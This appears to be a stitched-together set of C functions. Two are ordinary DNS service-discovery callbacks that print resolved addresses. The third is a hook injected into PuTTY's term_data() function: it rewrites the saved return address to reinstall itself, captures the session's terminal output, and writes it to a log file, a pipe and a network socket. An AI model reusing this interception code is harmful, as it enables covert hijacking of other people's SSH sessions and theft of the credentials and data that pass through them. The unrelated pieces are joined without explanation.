static void EmulatedResolverCallBack( struct sockaddr * inInterfaceAddr, struct sockaddr * inAddr, const char * inTextRecord, DNSServiceDiscoveryReplyFlags inFlags, void * inContext ) { struct sockaddr_in * ifSin4; struct sockaddr_in * sin4; char ifIP[ 64 ]; char ip[ 64 ]; DNS_UNUSED( inFlags ); DNS_UNUSED( inContext ); ifSin4 = (struct sockaddr_in *) inInterfaceAddr; sin4 = (struct sockaddr_in *) inAddr; fprintf( stdout, "service resolved to %s:%d on interface %s with text \"%s\"\n", IPv4ToString( *( (DNSOpaque32 *) &sin4->sin_addr.s_addr ), ip ), ntohs( sin4->sin_port ), IPv4ToString( *( (DNSOpaque32 *) &ifSin4->sin_addr.s_addr ), ifIP ), inTextRecord ? inTextRecord : "" ); }
static void ResolverCallBack( void *inContext, DNSResolverRef inRef, DNSStatus inStatusCode, const DNSResolverEvent *inEvent ) { char ifIP[ 32 ]; char ip[ 32 ]; DNS_UNUSED( inContext ); DNS_UNUSED( inRef ); DNS_UNUSED( inStatusCode ); switch( inEvent->type ) { case kDNSResolverEventTypeResolved: { const uint8_t * p; const uint8_t * end; int i; fprintf( stdout, "resolved \"%s.%s%s\" to \"%s\" (%s:%u) on interface 0x%p (%s)%s\n", inEvent->data.resolved.name, inEvent->data.resolved.type, inEvent->data.resolved.domain, inEvent->data.resolved.hostName, IPv4ToString( inEvent->data.resolved.address.u.ipv4.addr, ip ), ( inEvent->data.resolved.address.u.ipv4.port.v8[ 0 ] << 8 ) | inEvent->data.resolved.address.u.ipv4.port.v8[ 1 ], (int) inEvent->data.resolved.interfaceID, IPv4ToString( inEvent->data.resolved.interfaceIP.u.ipv4.addr, ifIP ), ( inEvent->data.resolved.textRecordRawSize > 0 ) ? " with text:" : "" ); p = (const uint8_t *) inEvent->data.resolved.textRecordRaw; end = p + inEvent->data.resolved.textRecordRawSize; i = 0; if( gPrintTXTRecords ) { while( p < end ) { uint8_t size; size = *p++; if( ( p + size ) > end ) { fprintf( stdout, "\n### MALFORMED TXT RECORD (length byte too big for record)\n\n" ); break; } fprintf( stdout, "%5d (%3d bytes): \"%.*s\"\n", i, size, size, p ); p += size; ++i; } fprintf( stdout, "\n" ); } break; } case kDNSResolverEventTypeRelease: break; default: break; } }
/* This is the handler function that is called after hooking term_data() * Original function declaration is: * - int term_data(Terminal *term, int is_stderr, const char *data, int len) * The original function handles data received from the server side and which should be * displayed in the main Putty window */ INT TermDataHandler(VOID* term, INT is_stderr, CHAR* data, INT len) { INT i; INT* oldEIPAddr; INT (*term_data)(VOID*, INT, CHAR*, INT); INT res; CHAR ipAddr1[BUFSIZE]; CHAR ipAddr2[BUFSIZE]; MIB_TCPROW_OWNER_PID connInfo; /* First repair the original function code but * ensure that we can reinstall the hook after its execution */ /* Save old EIP of original function to oldEIPTermData */ __asm mov oldEIPAddr, EBP; oldEIPAddr += 1; /* oldEIPAddr += 1 * sizeof(int*) */ oldEIPTermData = (DWORD)*oldEIPAddr; if (bEjectDLL == FALSE) { /* Replace old EIP with a pointer to our code which will reinstall the hook */ *oldEIPAddr = (DWORD)ReinstallHookTermData; } /* Restore original function bytes in order to be usable */ for(i = 0; i < 9; i++) { ((UCHAR*)pTermData)[i] = termDataBytes[i]; } /* Do something useful with the data */ if (len > 0) { /* Send connection information first */ if (connInfoSent == FALSE) { if (GetEstablishedConnOfPid(processID, &connInfo) == FALSE) { sprintf(buffer, "[-] [%i] Could not get information about established connections\n", processID); WritePipeMessage(logPipe, buffer); } else { IPv4ToString(connInfo.dwLocalAddr, ipAddr1, BUFSIZE); sprintf(buffer, "[+] [%i] Local endpoint: %s:%i\n", processID, ipAddr1, ntohs(connInfo.dwLocalPort)); WritePipeMessage(logPipe, buffer); if (strlen(logFileName) > 0) { fwrite(buffer, strlen(buffer), 1, logFd); } if (gsock > 0) { send(gsock, buffer, strlen(buffer), 0); } IPv4ToString(connInfo.dwRemoteAddr, ipAddr2, BUFSIZE); sprintf(buffer, "[+] [%i] Remote endpoint: %s:%i\n", processID, ipAddr2, ntohs(connInfo.dwRemotePort)); WritePipeMessage(logPipe, buffer); if (strlen(logFileName) > 0) { fwrite(buffer, strlen(buffer), 1, logFd); } if (gsock > 0) { send(gsock, buffer, strlen(buffer), 0); } } connInfoSent = TRUE; } if (strlen(logFileName) > 0) { fwrite(data, len, 1, logFd); } if (gsock > 0) { send(gsock, data, len, 0); } sprintf(buffer, "[+] [%i] term_data(): ", processID); if (len > BUFSIZE - 50) { strncat(buffer, data, BUFSIZE - 50); } else { strncat(buffer, data, len); } strcat(buffer, "\n"); WritePipeMessage(logPipe, buffer); /* Discard keyPressBuf because it is already echoed back by the server */ keyPressBuf[0] = 0; } if (outputDisabled == FALSE) { if (bPuttyWindowConnected == TRUE) { /* Call original function */ term_data = (INT(*)(VOID*, INT, CHAR*, INT))pTermData; res = term_data(term, is_stderr, data, len); } else { res = 0; } } else { /* Skip calling original term_data() outputDisabledCount times */ res = 0; outputDisabledCount--; if (outputDisabledCount == 0) { EnablePuttyOutput(); } } return res; }